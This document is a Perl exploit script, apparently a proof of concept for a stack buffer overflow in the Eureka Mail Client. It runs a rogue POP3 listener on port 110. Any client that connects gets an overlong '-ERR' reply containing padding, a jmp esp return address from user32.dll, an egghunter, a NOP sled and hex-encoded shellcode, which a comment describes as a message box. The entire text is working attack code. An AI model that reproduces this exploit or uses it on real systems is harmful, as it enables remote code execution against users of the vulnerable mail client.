use Socket;#fill out the local IP or hostname#which is used by Eureka EMail

1. use Socket;
2. #fill out the local IP or hostname
3. #which is used by Eureka EMail as POP3 server
4. #note : must be exact match !
5.  
6. my $localserver = "10.0.1.6";
7. #calculate offset to EIP
8. my $junk = "A" x (723 - length($localserver));
9. my $ret = pack('V',0x7E47BCAF); #jmp esp from user32.dll
10. my $padding = "\x90" x 300;
11. my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
12. "w00t". #this is the marker/tag
13. "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
14.  
15. # xsploited security msgbox! shellcode :D
16. my $shellcode = ("\x33\xc9\xba\x8d\x4c\x87\x06\xdb\xde\xd9\x74\x24\xf4\xb1\x45".
17. "\x5f\x31\x57\x13\x03\x57\x13\x83\xef\xfc\xe2\x78\x95\x6c\x9d".
18. "\x5b\x52\x57\x56\x6a\x49\x25\xe1\xbd\xa4\x2e\x85\xcc\x06\x24".
19. "\xef\x22\xec\x4c\x0c\xb1\xb4\xb8\xa7\xbb\x18\x32\x81\x7b\x16".
20. "\x5c\x9b\x88\xf1\x5d\xb2\x91\xe3\x3e\xbf\x01\xc0\x9a\x34\x9c".
21. "\x34\x68\x1e\x36\x3d\x6f\x75\xcd\xf7\x77\x02\x8b\x27\x89\xff".
22. "\xc8\x1c\xc0\x74\x3a\xd6\xd3\x64\x73\x17\xe2\xb8\x8f\x4b\x81".
23. "\xf9\x1b\x93\x4b\x36\xee\x9a\x8c\x22\x04\xa7\x6e\x91\xcc\xad".
24. "\x6f\x52\x56\x6a\x71\x8e\x00\xf9\x7d\x1b\x47\xa7\x61\x9a\xbc".
25. "\xd3\x9e\x17\x43\x0c\x17\x63\x67\xd0\x49\xaf\xd5\xe0\xa0\xfb".
26. "\x90\x14\x3b\xc1\xca\x58\x72\xc8\xe6\x37\x63\x4b\x09\x48\x8c".
27. "\xfd\xb0\xb3\xc8\x80\xe2\x5e\x5d\xfa\x0e\xbb\xf0\xec\xa0\x3c".
28. "\x0b\x13\x35\x87\xfc\x84\x29\x64\xdd\x15\xd9\x47\x2f\xb8\x7d".
29. "\xc0\x3a\xb7\x18\x62\x4d\x6b\xc6\x88\xc4\x72\x50\x72\x83\x7e".
30. "\xd5\x4e\x7c\xc4\x4d\xec\x30\x86\x0a\xed\xee\xa4\xfc\x6f\x10".
31. "\xb7\x03\x07\xb6\x68\xdb\xf8\x2e\x0d\x68\x9c\xcd\xa5\xe1\x37".
32. "\x66\x53\x95\xbf\xf5\xeb\x09\x71\x21\x83\x8d\x55\xd9\x1d\xce".
33. "\xfe\x95\x64\x31\xa7\x3d\xf4\x44\x25\xd7\x92\xc2\xe9\x54\x06".
34. "\x62\x85\xf3\xbc\x17\x31\x7c\x4e\xa7\xad\x4d\x79\xcf\x62\x8a".
35. "\x6a\x46\x9b\xe3\x5e\x0a\x0f\x55\x0d\x55\x7f\x64\x71\xf9\x7f".
36. "\xd2\x79");
37.  
38. my $payload=$junk.$ret.$egghunter.$padding."w00tw00t".$shellcode;
39.  
40.  
41. #set up listener on port 110
42. my $port=110;
43. my $proto=getprotobyname('tcp');
44. socket(SERVER,PF_INET,SOCK_STREAM,$proto);
45. my $paddr=sockaddr_in($port,INADDR_ANY);
46. bind(SERVER,$paddr);
47. listen(SERVER,SOMAXCONN);
48. print "[+] Listening on tcp port 110 [POP3]... \n";
49. print "[+] Configure Eureka Mail Client to connect to this host\n";
50. my $client_addr;
51. while($client_addr=accept(CLIENT,SERVER))
52. {
53.   print "[+] Client connected, sending evil payload\n";
54.   while(1)
55.   {
56.      print CLIENT "-ERR ".$payload."\n";
57.      print "    -> Sent ".length($payload)." bytes\n";
58.   }
59. }
60. close CLIENT;
61. print "[+] Connection closed\n";